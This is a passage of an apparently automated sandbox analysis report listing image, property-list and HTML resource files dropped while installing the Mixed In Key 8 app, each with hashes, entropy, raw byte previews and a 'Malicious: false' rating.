/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_NThybq Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	13150
Entropy (8bit):	6.710800521321472
Encrypted:	false
SSDEEP:	384:ogMDGYl9E0jeEYNg7Roe9EoRT89vFdRdf:ogMyo/eEYyREoNUvTf
MD5:	3019DBDF7C21BBD59181F7C270780E7F
SHA1:	4F3C098AFFEC0A9AD5AF2D22D2D191AF06F68652
SHA-256:	E4328BFB7C74A3773FE1D77ECCE52F23E0FB5A897381E33A41985BEDFFF4176D
SHA-512:	352624BEA2E1559279E48CF9A95FB3055A3654E7A74E9EB0FC5AE41A30B20832849C719B99CDD8B51059F836D9A394A8C7E5CC7EE86D6D2080B82321ADE0B41A
Malicious:	false
Preview:	bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.>.D.s............................................................. .#.-.0.3.4.8.<.E.I.J.T.X.b.e.o.r.s.y.................................................................#.)...3.9.;.=.>.?.@.C.D.I.J.O.P.T._.`.a.b.f.m.n.o...........e.....5.f.......%......................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....y.w.t...........x.. ...!."[NSClassName...._.-_TtC10MixedInKey27FileCopyingWindowController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.=..4.5.6.7.8.9.:.;.<.../.:.J.L.g.i.l.q."..?.@...A.B.CXNSSourceWNSLabel...-......E.F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.`.a.`.c.d.e.e.f.g.h.i.c.g.k.c.l.^.m.d.c.o.p

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_QpLAie Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 10 x 40, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2841
Entropy (8bit):	7.910899373244266
Encrypted:	false
SSDEEP:	48:BCt7H34gNMRwEbM20gzNXVYnl7L3+zLpN8T30gNBDMSsvu/6vnP:BCt7IIMRfwnXz+npN8IgXBsvuS/P
MD5:	1088016EB173212F3BBE06D89F636997
SHA1:	5AA13897E238C86B8DA6F30BCE9FE25555CCA457
SHA-256:	1130C6D18D21AD293AC39F62085D43DF312562BD573CA3ABD62FA80F8FE989BB
SHA-512:	6D487515B505C38DBF850F0ED23B730D62043C73FCC34BA7C97E048BDBFE4FAD682727528BD3E2BCB9A672480ABA6A37375DC8493E89D51F862C3D256BBA3F4D
Malicious:	false
Preview:	.PNG........IHDR.......(.....H4.....CiCCPICC Profile..x...wTSY...{/...B..z.MJ...z.^E%$.B....WD.W..i."."....Y+.XX.../."......e_..e........;s....<.(..BQ&..@.H"...`...1....D....py.YA.....?/.3.u..L...u......a2?.......K.B..\|A6..<..s%Y2.$...4.......QV.q..6....d....Q.Y.Y....;P.#.......#..\|.e.ti...7(.3..l.0..]".l.2E...Ay...J.,N....24O.8.Y.......g.vtd3}.........q.\|&'3#.+Z...;.....L......,...._._..z.;.z...e..A..o.o..l.........fK,..e......... ..@.Y.a..%E".r.......x...~......a.y.....)H.J.%LYQy..R13;...0Y..bt...8+.Yy.....b..=..2.(.m../..3EL..:...f. ./s....#./...7.....`hd...GW..}.$F......2.(.....\.~...d.....`.....oB.........-............... ....R@...\.........{@9..5..4........ep...}.>..#........Ax... 5H.2.. ......@(.....dH.I.U.F.....P..#t...].z....4.........aM.....;..G...dx).....p5\|.n./...>x.~.O!.!#.D.a!l...#qH."F. .H.R.4 mH'r..D&......abX.g./&...,..l.c.`.1..[.!.$.#.....a..~..l26...-..b....}...k.......p..X\*n%n.n...w....M..x5........%.\|\|.......?..C ...6.oB.AD.@

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_QpogF6 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 30 x 28, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	947
Entropy (8bit):	6.324310371336867
Encrypted:	false
SSDEEP:	24:g/65YWuqylxbDv/yKwZMQDJYMcGZaiake1bXz3pm:g/6zUvqhZM2Wki9m
MD5:	A476D341C83A84CBE12703A47594278F
SHA1:	F5E846D4D18B7BB83E4B03CBF5BCD04519F8D16E
SHA-256:	5D2838C306D4246EF314A806499BF1CCE54636E526E43769FFC9E3D94C1D68C2
SHA-512:	20C7ECC95D03A9C7D90242886D13E8CD594C185606AF6CAA118C61DD56E86A0CF47EACF57427B572031B4382C2334CB6ED12406AE99F8FCF297AA47095257A3B
Malicious:	false
Preview:	.PNG........IHDR.............v.......gAMA......a.....pHYs................riTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/">. <tiff:YResolution>72</tiff:YResolution>. <tiff:Compression>5</tiff:Compression>. <tiff:XResolution>72</tiff:XResolution>. <xmp:CreatorTool>Flying Meat Acorn 6.1.3</xmp:CreatorTool>. <xmp:ModifyDate>2018-07-06T14:31:33</xmp:ModifyDate>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.........IDATH.c`. .H...l...51.c.c`./I.y.61.....".....).&.M.$1.OI..VL..../..`1..Dr..b.. ...b&.E .)O. S..@..,.d..).X)....z.YLL...64......I.2....5.e#.bF..8%.A..\..?\.h..........[..1...!..?`..3.q....h....T....Q.Q#.....j......'.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_RXXEFF Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	467
Entropy (8bit):	7.235944718437383
Encrypted:	false
SSDEEP:	6:6v/lhP1WnDs54Jph3OLm2ywcaJDHliR+k6dIzJTf8FX8+qXQ1qPUg2bFtJvoac7A:6v/7bUl2ywP9l4+ZWT8FKULgarcIlRr7
MD5:	EB4700EF433EE10C93AF199A79EC04A3
SHA1:	6D63C4F6A151DEAB58263A21DAB49E59A9CBEFE6
SHA-256:	1A3DDF0E0FF89A465CBEBA1C0A95B76E91CC097872E9B381365BB8639EC070D7
SHA-512:	BC56E7BD9C057068F049BBC914931C4B0AA9F02DA46C8A27AA5F9B51DD64E4E3BC3BCDD38F45A14FFE127E28171D15A399CEC79F9D3DCC8E2F5AE71AA2324037
Malicious:	false
Preview:	.PNG........IHDR...$... .....z......tEXtSoftware.Adobe ImageReadyq.e<...uIDATx.btqqa ....D .D.{..;.x..'.P&2.X..V ^.......h >.....T.Y.p.Q".BC..!.E.zSh...A.dDq.....@e.9.....`s.;2..GK..%.A.i. .2.d=.B..i..`s.N2..AK....7$.JK..V/......Z..g../.j..=...O....jO..A.@....t.B.l...c........)....P'...F@.+...T.......Xb....h......R..%...$..c$..K.fl%Tl0.H'y........@...u.?.GU.9....C.O.vih.....y..4..t...q...Z.m&P.....k..1.].~....Q.... .A. !..D.r7h.9. ..aT<5v.[.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_RsXyoB Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	622
Entropy (8bit):	7.404463141396479
Encrypted:	false
SSDEEP:	12:6v/7vr1sMuHvjloYIrGzC5F9A+kUUJhzb3CjXPMwdoS1U4TgcmTPW:O10blo/yzw9AQ4IeSgTPW
MD5:	BBDC220AEA5CAD4E2FF300D0E519B088
SHA1:	4FFB02B3788FED06697141332B78132108276A5C
SHA-256:	8C61AF9BC4290727DC65B052B3149F10392B2A202C3B9B33F9937EF4945FB228
SHA-512:	03710D41B9056FA6FBFEB0A8756F9470A32959CAA80A9DA10C2C9C8C833AD5128570E30FF2F9F1EE830A0A5C2BDB7A746C985ED85910EC08925BABC4A5E3B3B6
Malicious:	false
Preview:	.PNG........IHDR...$...$.............tEXtSoftware.Adobe ImageReadyq.e<....IDATx...m.0.@M....L@:....t.`.....(.....H' ..L.P[.T.u...+H=........h>...I...".+.......I".....-.c$..z...W......`....F..J.d!..1...r.1....W.#..%..<;k....k_....`.......9c.........C........g..%..F5a..].B...P.W...cBW....e#.H .......D.q@K...#....mY.....$.}."..v..S?Dx.......%":...>@.25...#@.m@.R.!.......J..P.s..?@X..t]A..$...rb.......G..#.......]..)b.&....a....m...C..#....s..%,.s..%.m-.u)R%..j(t...kk.~..H(.E.l..=.-.J../b....'H..e.P#..6...=%fS...}./.....m.1.......0R:..<..+.....jh ..x.P.JY;R.#../....e,.....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_SngY8d Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 146 x 150, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10419
Entropy (8bit):	7.972878199886934
Encrypted:	false
SSDEEP:	192:ymSapbFUiVk1GlZtVXkgxcDbz7a3Ns63xhGC8VNLNOoKkzsoQjlr9:pSapbFzVk1GLxcXzu3N3hEC8VNLnJIz3
MD5:	024BC5E07D0FD27565BDD69BFF536ACA
SHA1:	D3F8CE77BB32DEB533C16B29114E39B0B97124C1
SHA-256:	BFD5389E9936485AC6FBEC9190D2ADC110CDB4A2B04BC16EB8A547BAE1E1924F
SHA-512:	CC1EC72497B463FA43C934A88D5FE69E55D7CF357DB9417902742355DAF619ECEFC91A9D1AEA868E674FFE2E5EDCA4226CA0B1DCC0712F2E87D4E7CDE3F3DE8A
Malicious:	false
Preview:	.PNG........IHDR..............4!.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...,PLTE.............................................................................................................................................................................................................................................................................................................9.u..'.IDATx.L\|.c.<.,...)..,+9.=9.3...vo....w/....^WU...c[.D"t...F.!..BN......>....k.R.x.XJ.%616x..bi...=.-)..v.>.C...~.l....4.BC.9L...1....j..o..P..g..x...k..16.l.=......7.o......r.\|.....d............}0g.?..9...=........`...:...Rt.../<[-.,.0v,.-..s..~.C.m.......Y.....M`HZ}{.d..3W.3p.6.w.:.k,E.X+.N\|...N;.U...b.X..Yp.x.......V.{b%...Ke..>N.....-.(../.9..V.^......A..-..i.....]{..X....o6.l..}H.`..VfM.Mc..I.?..^".........5..b..Z.....^..m ...E..1..c.Uy).k.pI.....<.8V4.H. .x_..V.>V...........<%\..C.;.b_. ..>.t..ECA..}..k....\|.)&o.n.^.>...........8..`.....? ..@..[..B6a

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_URzpqQ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 44 x 44, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.316707006483209
Encrypted:	false
SSDEEP:	12:6v/7rRH2jAttvuAVuINlmPxVCYXiGMHqAo1:batmYNOxtGql1
MD5:	2DD935B011D02BCB06B68E3AE41D6551
SHA1:	0D110A67331FD07233808D7605A0A765751F4561
SHA-256:	5E0977973DC355274F89298416E19A61C93E563A596CCC82D7B62D58EEC8FD21
SHA-512:	93AFE8A63EDE4A8242D2D991FA20E28FEACF74F9073F0BB80BA6BA00F01ABBB7019A2DE6C6F2FA3EF96A33CD3E4D94BE2CD9C8ED1783D8461CA4DFA96271A794
Malicious:	false
Preview:	.PNG........IHDR...,...,.......Z.....tEXtSoftware.Adobe ImageReadyq.e<...aIDATx..1n.0.E.y..E.N...wiF.!=Q.\... ..6@..H......>..p1,..&i.p^....$..\k..h)..Y....@..?.D.y.x{..M...........bU=b....{;Y.<..lJg.D..~*./..p..}....:...X..k..b..G.....8...f?4.^..!h.0S.5.l.....k.^.-.IA.Z....4$...1S.]E.X.tU..X..k..z..-.1d..X........Z..9.f..\...V.....&....8..x....V....V....Vs...V{D..0...a}J...J..3..p.{K.%..5.....;s..U..\|..........]...s.T....+....IEND.B`.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_WrQlPl Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 40 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4293
Entropy (8bit):	7.789638893526219
Encrypted:	false
SSDEEP:	96:4Zka8VKV5VBMGTZRa6gZkjLcN78JPFzrvZQxVmJ0:4Zk9VKV5VBkKIN7aw
MD5:	DEB2446FBBF5FA708348D76A2AB2D541
SHA1:	26FC3F0E7F0603A5C0663A525C8BD75C39765262
SHA-256:	41C556FAE0A8FE1B690393244D14381FFD902587578B366C7EF3C23A6A058639
SHA-512:	FC9AC66D9EF0DA305BFA02313A0CC3EEE0580513BE69D7BA45A6BD3E91680FE07DCFC1F1475BE8EBA7ABFECFD958E1756BAEDC7E725D9D33B0B46E521B482B60
Malicious:	false
Preview:	.PNG........IHDR...(...L.......bv....iCCPICC Profile..H....TSY...{/..B..z........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv....\|........n.=....\c.x.....L~...=&6......Q..P`..<...@.j..W}.D..c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q....\9..\|r..f....0O... P.L~2....<=....`P6.9\..Qva.0.y(.=`...b......Ou..R3A\..L.......#.3W........C..J../lf>t...V......2...lO3.".c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}..!....+3%.o...q?.D/oq..)...........+......f..l.S....uB...8 .0.+31gf_....U\|NrJ&..=%.t..ejL.4...`........%H.0.....Q.Mr.s...h.....\|N;..G.8....fs3[.`..H.Y......&....'....?... .,.,..2..d.<...."........u..8.Z.9p.\.7A/........`.\|.S...!*D.. uH.2.,!{.....0(....!.$..MP.T..C..z...,t....A...h.z.}........l....p.../...p......j.8.._.o....~.O".!#..b..#.H...$!\|d-R..".H#.t#w.......ah.:.....DbX......rL........L`.c.X........`.....l)........a?.p8y.......V.....p..>.(n...+.....<.../....._......d.:...C.#p.....c...~.3..Q..Ct$....U...v.m

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_Wrc2Rg Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	1546
Entropy (8bit):	5.015020480535862
Encrypted:	false
SSDEEP:	12:BMQtuzuo9qv6QclfhVD3cc/JqJmW04NbxfGfIzyENvODq6y4wemDGCEDcjGOlvf8:WCuqspVrcOiI4NbbbzbNnO6RrG9Gh+3J
MD5:	157F6800B8132247A46AFF4391D65B27
SHA1:	BDE682B657A278B12BC8B4C44E695435B9222F44
SHA-256:	99542796EDE3968AFA0FE944DE86887558A0C0AE992A840DB570B602715E5AB0
SHA-512:	90366B01338543E67F364E5FD80809ADDCD2E0E55F17D67BE06A2E1AF830709E1417B120E122EE6D2DEAADF4E20632E37FA8DE05E11B4ADFF7FEFEBD6E6EF5FA
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<title></title>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<link rel="stylesheet" href="top.css" type="text/css" media="screen, print" charset="utf-8">..<script type="text/javascript" src="top.js" charset="utf-8"></script>.</head>.<body>..<div id="logo-left" onclick="selectTab('browse'); window.location='mik://browse'"></div>..<div id="menu-left">...<a id="browse" class="first tab selected" onclick="selectTab('browse');" href="mik://browse" title="Switch to the browse panel">....<span class="contents">Collection</span>...</a>...<a id="tagedit" class="tab" onclick="selectTab('tagedit');" href="mik://tagedit" title="Edit file tags">....<span class="contents">Tags</span>...</a>...<a id="personalize" class="tab" onclick="selectTab('preferences');" href="mik://personalize" title="Personalize your settings">....<span class="contents">Settings</span>...</a>..</

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_YWk6Us Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Apple binary property list
Category:	dropped
Size (bytes):	11307
Entropy (8bit):	6.8240651039705575
Encrypted:	false
SSDEEP:	192:NYp1W/vmIuqmvOcHWufbZdspNoyqDjTqcKohOzBW6LITU/Y9AzNc2GSP:Nwg6vOcHWobLw2q0kg9AJc2GC
MD5:	EE316731D12BDD836FF83E3126D1B1FA
SHA1:	94DE9C0A4DF57CFB828187961F4B9322347D2DF3
SHA-256:	18F1E707DF95B32A1AB0AAC543E39E46FE9BFA73EEE1D41AFEE0EBD272A2AC2C
SHA-512:	332C3240AB10AF0A04848AC1832AC4EF65BF91C791F8C62216A5D3AACA729917B1D230828051D0C742C2249F8689FC9CB0A6B0969728F5961F413D5C710085B2
Malicious:	false
Preview:	bplist00..............>.?X$versionX$objectsY$archiverT$top...............#.$....2.S.Y.................................................................+.,.-.7.8.9.E.F.G.Q.R.S._.`.a.k.l.m.y.z.{.......................................................................".'.+...2.7.;.>.B.G.K.N.R.W.[.^.b.g.k.n.r.w.{.~....................................................................................... .$.)../.0.5.6.;.<.A.B.G.H.M.N.S.T.p.s.t.........\|.............~................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.8.;U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys..................... ...!."[NSClassName...._.2_TtC10MixedInKey32PropertyCheckboxesViewController..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_YpePNa Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=21, height=104, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=mik-top-left@2x.png, orientation=upper-left, width=275
Category:	dropped
Size (bytes):	43612
Entropy (8bit):	7.686593151643444
Encrypted:	false
SSDEEP:	768:xYz/g+T9yD7nU6j7QfLzfo9Devi+9VMj9X/eiYyE2/Rch/E1XZlHwaWyYyu:Ob74ZfQfPoIqc6XpxJchM1XZlQoK
MD5:	90BE9B3CDB26E7911F80D71718F3245F
SHA1:	A0232E3978B9478316533A0FA46C631ACEC222EF
SHA-256:	F949FA512A0A2EF1B81A080977EBF6453EDCD59048F5EF2E2ABBBAE346AEAF81
SHA-512:	B54E57081CC0A2F6AB58A96D05926CC03D0F6428CAA2014ACCB57236A310F87ED797699A2E05DD546E6D656EB8FB07EBC3F541228B1D579D86E75F2E4AB31446
Malicious:	false
Preview:	MM...]2.. P8$....BaP.d6...DbQ8P....;...........`.....@`@..N...@@......?.o(...?{._......... P.)..@._.J.V.W.VkU..v._.XlV;%..g.ZmV.e..o...,.+...&...y8.T........(....2. .L......L..#.I....^.#.?........>.`'...:}?./.....z9..GS3f.e....Px..T...g7...tz]>.W...v{Gv`<&.....0Y)....@ `@FL....-x.9...>..._...d....~......I.>.p[/.$pp.\|5...{(..8....y....z.......X.....&%5..m....u...}.... ....@........ .........; ..`....mx..@.\%..2....s...Jg...A.....pl....,......'.8..).u....s.Lq.Y6`!dt..Q.!S..5M..=O........}.$.............>.\............KpK..X(..@...e.....B.]..N.(.: .e.; S...$g.....o....X.l!83..Yv@...E{....}........ G....A..\WU..+.....Y..._Y.f5db/.;[3...2..]...i.v...$s...[h-.8.g.J.\U..K..i.q....M. @.L.$..u_........W....bh..C..I....b..ib...eX..j......ds.e.?......[..V...A.&j..S...s..:g.<.<.o.N...}...}.......V....o]....e....3.G....;\...}..=.......NO.3...A...T.^O.M...y.k=..w..._.[.._.}(.6.....t.W.....u..y......P..@R..C.....~..<?JH#..4.<Uj..bh.i...f........1...b...1+.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_ZaOzcJ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 190 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	66119
Entropy (8bit):	4.393937973533494
Encrypted:	false
SSDEEP:	768:s359ig/7N/2XK+WSXQaSIcjPvBT/VxLGBE5u0rZx56P:qN/oXK+WSXQnIcjpdBcOTu
MD5:	D5A3896C6B2E8A350AA85D3AD4C5F9E7
SHA1:	889B0E418D806FF5863943E166F8DEE5CA6E17F6
SHA-256:	F1B6F4BA0DB72699CF5BA8107B6EFD68A40820C4D92E16C048970B58F53DB0AC
SHA-512:	23AB267E1F14ADF3D061771AEB151CB36685B6DA24BF11F6F6A7185534BF7BF6A823D38DC397F0E753DC4893274B1F063F2470D2EFECB4717AAB33230786C4F3
Malicious:	false
Preview:	.PNG........IHDR.......2.......a>....pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_aOF0eW Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 18 x 35, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3708
Entropy (8bit):	7.730834492790864
Encrypted:	false
SSDEEP:	96:5Zka8VKV5VBMGTZRa6gZkjLcN78JPFdSp/ThZMqzzZc:5Zk9VKV5VBkKIN7cSp/5+
MD5:	D24DBD3A38FD6660C76874584E6784A8
SHA1:	BDA0CC006DE711AC14D6826C9DC4559D49509A46
SHA-256:	B9A4B5E37C1ED4DD9E1BFD2FA505BE413D8DC2A88D229B0296CF598029FE9495
SHA-512:	80D6783C918BED958B8284160859F76515B0EB874B0D2E0E33477C4026C479A0D917E7A37B6CCD90B839E58E90A13384592FB3053FFB7775513C728070A78676
Malicious:	false
Preview:	.PNG........IHDR.......#.............iCCPICC Profile..H....TSY...{/..B..z........PB.1!...Q.. "...C..G..X.Ql..R..dPQ.....}..vv....\|........n.=....\c.x.....L~...=&6......Q..P`..<...@.j..W}.D..c2S....WI...,..P....V..g.8...3.@.h^+;.7.[Q....\9..\|r..f....0O... P.L~2....<=....`P6.9\..Qva.0.y(.=`...b......Ou..R3A\..L.......#.3W........C..J../lf>t...V......2...lO3.".c..3n..L..9..E..1.?.,'..1...a.....@q.D......s...a.qnJD..gq...X...0?.S.....='.}..!....+3%.o...q?.D/oq..)...........+......f..l.S....uB...8 .0.+31gf_....U\|NrJ&..=%.t..ejL.4...`........%H.0.....Q.Mr.s...h.....\|N;..G.8....fs3[.`..H.Y......&....'....?... .,.,..2..d.<...."........u..8.Z.9p.\.7A/........`.\|.S...!*D.. uH.2.,!{.....0(....!.$..MP.T..C..z...,t....A...h.z.}........l....p.../...p......j.8.._.o....~.O".!#..b..#.H...$!\|d-R..".H#.t#w.......ah.:.....DbX......rL........L`.c.X........`.....l)........a?.p8y.......V.....p..>.(n...+.....<.../....._......d.:...C.#p.....c...~.3..Q..Ct$....U...v.m

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_by1E3J Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	PNG image data, 180 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	64028
Entropy (8bit):	4.507098925086711
Encrypted:	false
SSDEEP:	768:035Wiov/7N/p+i+0bB8N9C7DqcjLxhpIj9QkJabtaZ9+XCK3XDd1:RFv/WiLbyN+OgLq98sZ9+X33XDd1
MD5:	86FD6051E68615A7B52481DE3AC21E27
SHA1:	4F266E381F57F22255ED29A17C6F121C9B8E2566
SHA-256:	4DF57EA5C4ADB0204C8D05FCD5239C27CDE5F3AB6A8840AC80461176924AEFBC
SHA-512:	BD75BC6C41438D1302824F1B06E3F7F6793B0927949A206D727994B9F28324F8D2F0B0331F09A62698C83001B98C9E0C4C6FD19CE230073DB8D217DCEAD61AAB
Malicious:	false
Preview:	.PNG........IHDR.......2......$......pHYs...%...%.IR$....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_cJXpFA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=23, height=164, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=songs-empty@2x.png, orientation=upper-left, width=1078
Category:	dropped
Size (bytes):	28304
Entropy (8bit):	7.719662646510649
Encrypted:	false
